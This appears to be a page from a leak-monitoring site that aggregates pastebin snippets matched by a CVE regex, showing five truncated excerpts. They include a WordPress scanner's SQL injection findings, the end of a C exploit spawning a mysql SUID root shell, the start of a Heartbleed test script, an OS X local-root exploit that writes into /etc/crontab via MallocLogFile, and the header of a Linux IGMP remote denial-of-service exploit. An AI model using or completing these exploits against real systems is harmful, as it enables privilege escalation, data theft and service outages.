LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘CVE Reference’

CVE Reference

0 votedvote

Detected 13 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

Symposium <=  15.5.1 - Unauthenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8140
    Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
    Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8

[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8148
    Reference: https://security.dxw.com/advisories/blind-sql

Source: http://pastebin.com/raw.php?i=B0VvQr0y

CVE Reference

0 votedvote

Detected 10 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

D shell\033[0m: \n\n", cnt);
    system("ls -l " SUID_SHELL);

    printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n    Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
    system(SUID_SHELL " -p -i ");
    //system(SUID_SHELL " -p -c '/bin/bash -i -p'");

    /* close MySQL connection and exit */
    printf("\n[+] Job done. Exiting\n\n");
    mysql_close(conn);
    return 0;

}

Source: http://pastebin.com/raw.php?i=6cJakwbY

CVE Reference

0 votedvote

Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

 by Malik Mesellem (@MME_IT)

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=8443, help='TCP port to test (default: 8443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 

Source: http://pastebin.com/raw.php?i=Xfi9PRc8

CVE Reference

0 votedvote

Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root

import os,time,sys

env = {}

s = os.stat("/etc/sudoers").st_size

env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL

Source: http://pastebin.com/raw.php?i=kK3pYDzN

CVE Reference

0 votedvote

Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** written By Kingcope
** Year 2012
** Ripped & modified code written by Firestorm
** Tested against * OpenSuSE 11.4 system
**		  * Recent Ubuntu Distro
**
** Example:
** ./undeadattack 192.168.2.16 192.168.2.3
** The Linux Kernel at the rem

Source: http://pastebin.com/raw.php?i=2vKd7TnE